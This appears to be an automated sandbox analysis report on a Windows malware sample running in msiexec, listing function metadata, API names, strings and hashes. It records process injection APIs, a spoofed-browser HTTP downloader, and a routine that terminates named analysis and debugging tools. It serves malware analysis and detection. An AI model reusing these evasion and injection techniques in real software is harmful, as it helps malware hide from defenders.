                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                  • Opcode ID: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction ID: 6f240d9faaa65802af0f72cb28b3611e6a316a0787cd7e7115851dd3d0497229
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C632C772A0CBC686E774CB16E8547AAA7A1FB88B44F044135DA8DD3B98EF3CD445DB01
                                                                                                                                                                                                                                  Function 00007FF65D6F10D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                                  • API String ID: 3743895883-721857904
                                                                                                                                                                                                                                  • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction ID: 8ca3f20a1ac0d1e158e2e540d069da6f7a739a65176d572744e75c8bb6d5762c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5371D532A0DE8286E760CB15E48436AB7A0FB84784F544135D68DD6BACEF7CD48ADF41
                                                                                                                                                                                                                                  Function 00007FF65D6F2168 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF65D6F21A5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                                  • Opcode ID: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction ID: 761b83d0f16c3b24c6e39a36d1ff078603daafbeba8d3534d40d397834862ad0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D871F976A1CE8282E750CB54F45432AB760FBC8794F145135EA8E97AACEF7CD485DB00
                                                                                                                                                                                                                                  Function 00007FF65D6F452C Relevance: 24.2, APIs: 16, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocateCloseFileHandleProcessSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1391523307-0
                                                                                                                                                                                                                                  • Opcode ID: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction ID: fbe12972bcf99813fc282cc390fd0a716c7b9849167dd2d0d2df869e49728de3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3281FE76A0CF8286EA50CB55F48436AB7A0FBC9B91F144135DA8D93BA8EF7CD0459B00
                                                                                                                                                                                                                                  Function 00007FF65D6F3074 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F440C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F30AF), ref: 00007FF65D6F449C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3BEC: RegDeleteKeyW.ADVAPI32 ref: 00007FF65D6F3C04
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF65D6F3DFF
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: Process32FirstW.KERNEL32 ref: 00007FF65D6F3E32
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: CloseHandle.KERNEL32 ref: 00007FF65D6F3E44
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: wcscmp.MSVCRT ref: 00007FF65D6F3E59
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: OpenProcess.KERNEL32 ref: 00007FF65D6F3E6F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: TerminateProcess.KERNEL32 ref: 00007FF65D6F3E92
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: CloseHandle.KERNEL32 ref: 00007FF65D6F3EA0
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: Process32NextW.KERNEL32 ref: 00007FF65D6F3EB3
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F3DEC: CloseHandle.KERNEL32 ref: 00007FF65D6F3EC5
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF65D6F315E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
                                                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                  • API String ID: 4011447834-928700279
                                                                                                                                                                                                                                  • Opcode ID: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction ID: 51ec0c65165719889abe871c518dbacfca20d9e0487d7114d524a36badbb1081
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E321B761E1CF0390EA00EB64E8912F57724AF54340F880131D40DE71EEFEBEE58BA241
                                                                                                                                                                                                                                  Function 00007FF65D6F2E04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                                                  • Opcode ID: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction ID: ff57f9abe31848664db76bf1fc5601229be0f2f9080e9f04889db9871b94af04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8501E966E0CE0381EB209B51E8542796760FBCCB98F580571D98ED27BCEE3DD5C6DA01
                                                                                                                                                                                                                                  Function 00007FF65D6F388C Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF65D6F374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F370C: GetVolumeInformationW.KERNEL32 ref: 00007FF65D6F37C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F370C: wsprintfW.USER32 ref: 00007FF65D6F386A
                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F38D5
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F38EA
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F38FD
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F390D
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F3935
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F3948
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F395D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 943468954-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 6ed53865e5a1d7bb9d79adebd20b200707d0e96ed26512feaf5f8c4fc5f8f4da
                                                                                                                                                                                                                                  • Instruction ID: 72bcb47af0dfee82fa711c40e77db854f224e6e898654cf4ad32b80fb4c54e45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ed53865e5a1d7bb9d79adebd20b200707d0e96ed26512feaf5f8c4fc5f8f4da
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D114F62A2CD8385DB648F65F86436A6362FBC4744F445031DA8E83BACEF3CD04AD744
                                                                                                                                                                                                                                  Function 00007FF65D6F3DEC Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                                                  • Opcode ID: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction ID: 1358946bcb074b2aa6213dc136ca671c09e1f10e1176579826283e90813a4db5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1521A571A0CE8781EB709B11E88836A6361FFC4B54F044235C69E926ECEF3DD486EB01
                                                                                                                                                                                                                                  Function 00007FF65D6F2EA4 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                                                  • Opcode ID: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction ID: d7b682caec4d98785f4ae0ef03191c5f5733e156539d4837e256631eca0c39e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E101CC62E1CE43C2EB209B51E8542296370FBC8B45F440571E98EE66FCEE3DD5869A01
                                                                                                                                                                                                                                  Function 00007FF65D6F3CAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                  • Opcode ID: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction ID: 328abe92d52b14b60a9496ec2526a791f627ec79dcda3b107721dd5e43b9d6a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4131C672A1CEC585DA70DB15E4987AAA3A0FB88740F400125DA8DD3BA8EF3DD555DB00
                                                                                                                                                                                                                                  Function 00007FF65D6F13C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                                  • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction ID: 73c203eaeb5c35a11536164fe6f06df1d97ab2165772a1e64d072146c6191603
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C01DA32D0DA4386E6308B10E45432967A0FB84388F985135D68D926DCEF7CD55AEF04
                                                                                                                                                                                                                                  Function 00007FF65D6F3FCC Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                                                  • Opcode ID: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction ID: 30e0f2d922dcb30786ecfe884d8f5dbcf4b10b018b7c35944466d9f3babc764d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F411EC71E0CE8786EB708F10E48836A63A0FB84794F544234D69D96AECEF3DE545EB00
                                                                                                                                                                                                                                  Function 00007FF65D6F370C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
